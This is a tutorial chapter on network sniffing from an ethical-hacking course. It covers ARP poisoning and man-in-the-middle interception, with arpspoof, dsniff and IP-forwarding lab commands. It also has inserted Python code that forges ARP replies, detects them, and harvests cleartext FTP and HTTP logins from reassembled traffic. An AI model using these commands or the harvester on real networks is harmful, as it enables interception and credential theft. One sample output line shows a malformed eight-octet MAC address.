Venom Academy/Ethical Hacking/Sniffing

In this chapter we will look at sniffing. Sniffing is a method of harvesting data by capturing packets as they cross a network, wired or wireless. The main goal of sniffing is to capture unencrypted communication: traffic protected by TLS, SSH or another encryption layer can still be captured, but its contents cannot be read. Let's look at it in a bit more detail.

Types of sniffing
Sniffing is divided into two categories, explained below:


 * Active Sniffing
 * Passive Sniffing

Active Sniffing
Active sniffing happens when the attacker directly interacts with the victim machine, sending packets and listening for the responses. Examples include ARP spoofing and man-in-the-middle attacks. Because the attacker injects traffic onto the network, active sniffing leaves traces that can be detected.

Passive sniffing
Passive sniffing happens when the attacker does not interact with the target machine at all: the attacker only listens for packets, without injecting any traffic. This works on shared media such as a hub or an open wireless network, where every station sees every frame. On a switched network the switch only forwards a frame to the port that owns its destination MAC address, so passive sniffing there yields little more than broadcast traffic, and the attacker has to fall back on the active techniques described later in this chapter.

Promiscuous and nonpromiscuous mode
Before any sniffing can be done on a network, you first need to understand the difference between promiscuous and nonpromiscuous mode on a network card. By default your network card runs in nonpromiscuous mode, which means it only passes up to the operating system the frames that are addressed to it (plus broadcast and subscribed multicast frames). In promiscuous mode the card passes up every frame it sees on the wire, including traffic not intended for our computer. Sniffers such as tcpdump and Wireshark switch the interface into promiscuous mode when they start capturing; on Linux you can also do it by hand with
ip link set dev eth0 promisc on
and confirm it with ip link show eth0, which lists PROMISC among the interface flags. Keep in mind that promiscuous mode only lets you see what actually reaches your port: on a switched network that is still mostly your own and broadcast traffic, which is why the active techniques below are needed.

Man in the Middle attack (MITM)
The goal of a MITM attack is for the attacker to place themselves in the middle of the communication between two machines. For example, when someone logs into Facebook, the attacker places themselves between the victim and the Facebook server, so every packet exchanged between the two passes through the attacker and can be captured. Remember the point made at the start of the chapter: if the session is encrypted (Facebook, like most large sites today, forces HTTPS), the attacker still sees the packets but not the credentials inside them, unless they can also strip or break the encryption.

ARP Poisoning
ARP poisoning is the most popular technique for intercepting communication between two machines on the same LAN. ARP maps IP addresses to MAC addresses, and hosts accept ARP replies without any authentication, even replies they never asked for. The attacker sends forged ARP replies to both the target and the server (usually the default gateway): the target is told that the gateway's IP address is at the attacker's MAC address, and the gateway is told that the target's IP address is at the attacker's MAC address. Both hosts update their ARP caches accordingly and send their packets to the attacker, believing it to be the other party. With IP forwarding enabled, the attacker relays the packets on to their real destination and neither side notices the detour.
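The following is an added example, not code from the Venom Academy page: it builds the forged "is-at" replies that an ARP poisoning sends (one to each side, as described above), decodes them again, and shows the arpwatch-style check a defender would run to catch the attack. The IP addresses are the ones used in this chapter's lab; the MAC addresses, and the names build_arp_reply, poison_frames, parse_arp and ArpWatch, are assumptions made for this example.

```python
import struct

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode "is-at"

# Constructed addresses for this example: the IPs match the lab, the MACs are made up.
VICTIM_IP, VICTIM_MAC = "192.168.75.142", "00:0c:29:11:22:33"
GATEWAY_IP, GATEWAY_MAC = "192.168.75.2", "00:50:56:ee:ee:ee"
ATTACKER_MAC = "00:0c:29:aa:bb:cc"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply that says "sender_ip is-at sender_mac".
    A host receiving it overwrites its ARP cache entry; nothing is authenticated."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return ethernet + arp


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two forged replies of a both-direction poisoning: the victim is told the
    gateway is at the attacker's MAC, the gateway is told the victim is at the
    attacker's MAC. A tool like arpspoof resends these every couple of seconds."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return [to_victim, to_gateway]


def parse_arp(frame):
    """Decode an Ethernet/ARP frame; None for anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }


class ArpWatch:
    """Passive detector in the style of arpwatch: remembers which MAC each IP claimed
    and alerts when a later reply claims a different one. Poisoning shows up as the
    gateway's IP suddenly moving to another MAC."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None or arp["opcode"] != ARP_REPLY:
            return None
        previous = self.table.get(arp["sender_ip"])
        self.table[arp["sender_ip"]] = arp["sender_mac"]
        if previous is not None and previous != arp["sender_mac"]:
            return f"ALERT: {arp['sender_ip']} changed from {previous} to {arp['sender_mac']}"
        return None


if __name__ == "__main__":
    watch = ArpWatch()
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    print(watch.observe(legit))  # genuine reply is learned silently
    for frame in poison_frames(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP):
        print(parse_arp(frame), watch.observe(frame))  # forged reply to the victim alerts
```

Sending these frames on a real interface needs a raw socket and root; the point here is the wire format and the fact that the only defence signal is the IP-to-MAC mapping changing, which is exactly what ArpWatch keys on.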

Lab exercise
Before we can perform a MITM attack, we first need to enable IP forwarding so that the traffic we intercept is forwarded on to its intended destination (without this the victim simply loses connectivity, which gives the attack away immediately). To do this use the following command:
root@venom [$]~ echo 1 > /proc/sys/net/ipv4/ip_forward
Now that we have enabled IP forwarding, we need to gather the information required to perform the MITM attack:


 * 1) The attacker's IP address
 * 2) The victim's IP address
 * 3) The default gateway's IP address

To find your own IP address use the ifconfig command (or ip addr on newer systems). To find the victim's IP address we can use netdiscover:
root@venom [$]~ netdiscover
Netdiscover sends ARP requests for every address in the range and lists each machine that answers, together with its MAC address; all you need to do is copy the IP address of the victim. The default gateway will also appear in the netdiscover listing (you can confirm it with route -n or ip route).

Now, to perform the MITM attack, we first need to carry out the ARP poisoning using arpspoof. The command syntax is:
arpspoof -i <interface> -t <target IP> <host IP>
This tells the target that the host's IP address is at our MAC address. Here is an example and its output:
root@venom [$]~ arpspoof -i eth0 -t 192.168.75.142 192.168.75.2
0a:12:18:1a:2b:16:32:8c 0806 ARP reply 192.168.75.2 is-at 0a:12:18:1a:2b:16:32:8c
As we can see above, arpspoof keeps sending forged replies telling 192.168.75.142 (the victim) that 192.168.75.2 (the gateway) is at our MAC address. This poisons only one direction; to receive the gateway's replies to the victim as well, run a second arpspoof in another terminal with the two addresses swapped:
root@venom [$]~ arpspoof -i eth0 -t 192.168.75.2 192.168.75.142

Now we need to pass the traffic we are receiving to a tool called dsniff, which watches the captured packets for credentials sent in cleartext by protocols such as FTP, Telnet, HTTP, POP and IMAP. Execute the command below:
root@venom [$]~ dsniff
In our example dsniff returned the output shown below:
dsniff: listening on eth0
---
07/23/13 07:14:20 tcp 192.168.75.142 -> venom.machines.com 21 (ftp)
USER anonymous
PASS IFuser
As the example shows, dsniff returned the password harvested during the MITM attack: the victim's FTP login crossed the wire in cleartext, so there was nothing to decrypt. When you are done, stop both arpspoof processes with Ctrl-C; on exit arpspoof sends the correct mappings again so that the victim's and gateway's ARP caches are restored.
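The following is an added example, not code from the Venom Academy page and not dsniff's own source: it shows what dsniff is doing in the last step of the lab, namely reassembling the client side of each TCP flow into lines and pulling out logins that protocols send in cleartext. It goes slightly beyond the lab's FTP case by also decoding HTTP Basic authentication. The traffic is constructed for this example (the victim address is the lab's 192.168.75.142; the server address 192.168.75.10, the ports and the HTTP login are made up), and the names CredentialSniffer, feed and run_sample are assumptions.

```python
import base64
import re
from collections import defaultdict

FTP_PORT, HTTP_PORT = 21, 80


class CredentialSniffer:
    """Passive credential harvester in the spirit of dsniff: takes TCP segments as a
    sniffer hands them over, reassembles each client-to-server flow into lines, and
    extracts logins from protocols that send them in cleartext."""

    def __init__(self):
        self.buffers = defaultdict(bytes)  # per-flow buffer for lines split across segments
        self.pending_user = {}             # flow -> FTP USER seen, waiting for its PASS
        self.found = []                    # (protocol, server_ip, username, password)

    def feed(self, src_ip, src_port, dst_ip, dst_port, payload):
        flow = (src_ip, src_port, dst_ip, dst_port)
        self.buffers[flow] += payload
        lines = self.buffers[flow].split(b"\r\n")
        self.buffers[flow] = lines.pop()   # keep the incomplete tail for the next segment
        for line in lines:
            if dst_port == FTP_PORT:
                self._ftp(flow, line)
            elif dst_port == HTTP_PORT:
                self._http(flow, line)

    def _ftp(self, flow, line):
        upper = line.upper()
        if upper.startswith(b"USER "):
            self.pending_user[flow] = line[5:].decode(errors="replace")
        elif upper.startswith(b"PASS ") and flow in self.pending_user:
            # Only pair a PASS with a USER from the same flow; a stray PASS is ignored.
            user = self.pending_user.pop(flow)
            self.found.append(("ftp", flow[2], user, line[5:].decode(errors="replace")))

    def _http(self, flow, line):
        match = re.match(rb"Authorization:\s*Basic\s+(\S+)", line, re.IGNORECASE)
        if not match:
            return
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            return  # malformed header: never let attacker-controlled bytes crash the sniffer
        user, _, password = decoded.partition(":")
        self.found.append(("http", flow[2], user, password))


# Constructed sample traffic, not a real capture. Note the FTP password split across
# two TCP segments, the server replies mixed in, and a PASS with no preceding USER.
SERVER = "192.168.75.10"
SAMPLE_SEGMENTS = [
    ("192.168.75.142", 50211, SERVER, 21, b"USER anonymous\r\n"),
    (SERVER, 21, "192.168.75.142", 50211, b"331 Please specify the password.\r\n"),
    ("192.168.75.142", 50211, SERVER, 21, b"PASS IF"),
    ("192.168.75.142", 50211, SERVER, 21, b"user\r\nSYST\r\n"),
    ("192.168.75.142", 50300, SERVER, 21, b"PASS orphan\r\n"),
    ("192.168.75.142", 50412, SERVER, 80,
     b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
     + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"),
]


def run_sample():
    """Feed the constructed segments through the sniffer and return what it harvested."""
    sniffer = CredentialSniffer()
    for segment in SAMPLE_SEGMENTS:
        sniffer.feed(*segment)
    return sniffer.found


if __name__ == "__main__":
    for proto, server, user, password in run_sample():
        print(f"{proto}\t{server}\tUSER {user}\tPASS {password}")
```

The per-flow buffer matters in practice: a login that straddles a segment boundary is missed by any tool that matches on single packets, which is why dsniff reassembles TCP streams before looking for credentials.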

There are many other tools for sniffing, far too many to mention here; play around with them.
